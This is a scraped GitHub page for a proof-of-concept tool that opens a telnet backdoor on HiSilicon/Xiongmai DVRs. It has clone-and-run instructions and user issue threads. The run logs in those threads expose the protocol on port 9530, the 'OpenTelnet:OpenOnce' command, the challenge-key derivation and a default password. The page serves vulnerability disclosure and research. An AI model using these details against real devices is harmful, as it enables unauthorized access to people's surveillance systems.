tothi / hs-dvr-telnet Goto Github PK

51.0 7.0 24.0 2 KB

open telnet port on modern HiSilicon devices

Python 100.00%

hs-dvr-telnet's Introduction

hs-dvr-telnet.py

Python implementation using a slightly modified 3DES algorithm for opening telnet interface on HiSilicon DVR devices with advanced (encrypted) command parser.

Co-work with Vladislav Yarmak (@snawoot).

Detailed analysis of this 0day backdoor by Vladislav is here:

https://habr.com/en/post/486856/

Recommended usage of this PoC:

git clone https://github.com/tothi/hs-dvr-telnet
cd hs-dvr-telnet
python -m venv venv
. ./venv/bin/activate
pip install -r requirements.txt
./hs-dvr-telnet.py

vendor(?) reply

Huawei/HiSilicon released a "this is not ours" Security Notice about the backdoor.

At the moment, it seems the affected part of the firmware is related to an OEM vendor (what is most likely Hangzhou Xiongmai Technology).

hs-dvr-telnet's People

Contributors

Stargazers

Watchers

hs-dvr-telnet's Issues

EOF error with Hi3520D

When running the code on my Fisotech box, I get the following output:

[+] Opening connection to 192.168.1.30 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:96528459
[*] using password 2wj9fsa2
[*] initializing (modified) 3des with key 965284592wj9fsa2
[*] sending encrypted challenge 42:6F:3E:B9:8D:6A:01:EE:B6:62:FC:32:F8:6B:53:EC
[+] verify:OK
[*] sending encrypted command Telnet:OpenOnce...
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 54, in <module>
    dvrHelper.open_telnet(args.password)
  File "./hs-dvr-telnet.py", line 42, in open_telnet
    self.recvuntil("Open:")
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 310, in recvuntil
    res = self.recv(timeout=self.timeout)
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 82, in recv
    return self._recv(numb, timeout) or b''
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 160, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 131, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
  File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
    raise EOFError
EOFError

Does that mean that my box is not vulnerable to this 0day?

Plugged in recent xiongmaitech releases...

I have an XM NVR with firmware "Build Date: 2020-09-12 15:59:39", and here's portscan:

80/tcp    open  http
554/tcp   open  rtsp
12901/tcp open  unknown
23000/tcp open  inovaport1
30100/tcp open  rwp
34567/tcp open  dhanalakshmi

Which is of course only sad, as it complicates users' access to their devices...

doesn't work for me

Hello,

The PoC does not work on my xiongmaitech AHB7804R NVR (HiSilicon Hi3520) with the latest firmware (V3_V4.03.R11.7601).

When I run it I get :

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[+] Opening connection to 192.168.1.24 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:34929138
[*] using password live3636
[*] initializing (modified) 3des with key 34929138live3636
[*] sending encrypted challenge 8B:CB:CB:2B:86:85:0A:8C:D7:99:AB:6D:B8:D8:55:E4
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 54, in <module>
    dvrHelper.open_telnet(args.password)
  File "./hs-dvr-telnet.py", line 37, in open_telnet
    assert self.recv(2) == b"OK"
AssertionError

And then the 9530 port closes (I don't see it anymore on nmap)
When I launch the script a second time I get :

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[-] Opening connection to 192.168.1.24 on port 9530: Failed
[ERROR] Could not connect to 192.168.1.24 on port 9530
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 53, in <module>
    dvrHelper = DvrHelper(args.host, PORT)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 75, in __init__
    self.sock   = self._connect(fam, typ)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 115, in _connect
    self.error("Could not connect to %s on port %d" % (self.rhost, self.rport))
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/log.py", line 417, in error
    raise PwnlibException(message % args)
pwnlib.exception.PwnlibException: Could not connect to 192.168.1.24 on port 9530

Rebooting the NVR reopen the 9530 port.

Thank you

tothi / hs-dvr-telnet Goto Github PK

hs-dvr-telnet's Introduction

hs-dvr-telnet.py

vendor(?) reply

hs-dvr-telnet's People

Contributors

Stargazers

Watchers

Forkers

hs-dvr-telnet's Issues

EOF error with Hi3520D

Plugged in recent xiongmaitech releases...

doesn't work for me

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent